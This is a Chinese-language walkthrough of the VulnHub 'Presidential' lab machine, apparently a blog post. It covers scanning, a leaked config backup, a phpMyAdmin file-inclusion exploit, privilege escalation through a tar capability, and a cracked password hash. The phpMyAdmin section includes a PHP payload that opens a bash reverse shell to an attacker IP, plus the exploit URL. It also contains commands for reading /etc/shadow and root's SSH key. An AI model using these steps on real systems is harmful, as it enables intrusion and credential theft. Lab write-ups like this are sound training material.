vulnhub之presidential

目录

一、nmap主机发现

二、端口扫描

三、服务版本发现

四、信息收集

五、目录扫描

 六、子域名爆破

七、phpmyadmin

 八、反弹shell

九、john的hash值爆破

十、capability

十一、tars提权

1.读取/etc/shadow

2.读取私钥文件


一、nmap主机发现

做一个基于ping的扫描,其他有点慢

二、端口扫描

三、服务版本发现

四、信息收集

1.主页

至于其他功能,源码处,对我们来说没有太多的作用。

五、目录扫描

挨个查看,都没反应,上面收集到了域名,绑定域名,在尝试。

1.绑定域名

2./config.php.bak

这个里面有107B的数据。在源码下我们发现了数据库的名,账号密码

 六、子域名爆破

爆破出来一个database.votenow.local,绑定ip,后访问。

 发现一个phpmyadmin的登陆界面,结合我们前面发现的账号密码,登录phpmyadmin。

七、phpmyadmin

1.查看版本

2.漏洞搜索

这里有三个漏洞,我们来使用44928.txt文件包含漏洞。

3.文件内容

先利用数据库写入文件,之后来利用文件包含执行文件

4.尝试

注意:将sessions改为session,否则不成功

前边写域名,后面加上session就ok了

 八、反弹shell

 退出重新登陆获得一个新的session,其余步骤和上述相通

select '<?php system('bash -i >& /dev/tcp/192.168.0.107/8888 0>&1');exit;?>'

http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_t9huqlt16d5655p5mact2saf82in9tq0

九、john的hash值爆破

在phpmyadmin中我们还发现了一个用户名和hash值

admin            $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i

尝试爆破

john hash --wordlist=rockyou.txt

Stella

su admin

并python返回一下shell

十、capability

1.查看具有capability的权限

getcap -r / 2>/dev/null

2.代表意思:

Permitted

这个集合定义了线程所能够拥有的特权的上限,是InheritableEffective集合的的超集

Effective

内核检查特权操作时,实际检查的集合(可以通过执行操作前增/删Effective中的capabilities,以达到临时开/关权限的功能)

3.挨个查看

找到我们admin用户可以执行的命令。tars我们可以执行。

十一、tars提权

1.读取/etc/shadow

读取压缩

tar -cf archive.tar /etc/shadow

解压缩

tar -xf archive.tar

利用里面root的hash值,找字典去碰。找到对的字典应该可以破解出来

2.读取私钥文件

和上面一样来tarS来读取文件,然后解压。放到admin的.ssh下面,然后通过ssh登录,提权成功

ssh -i id_rsa root@localhost -p 2082

拿到flag

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梅_花_七

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值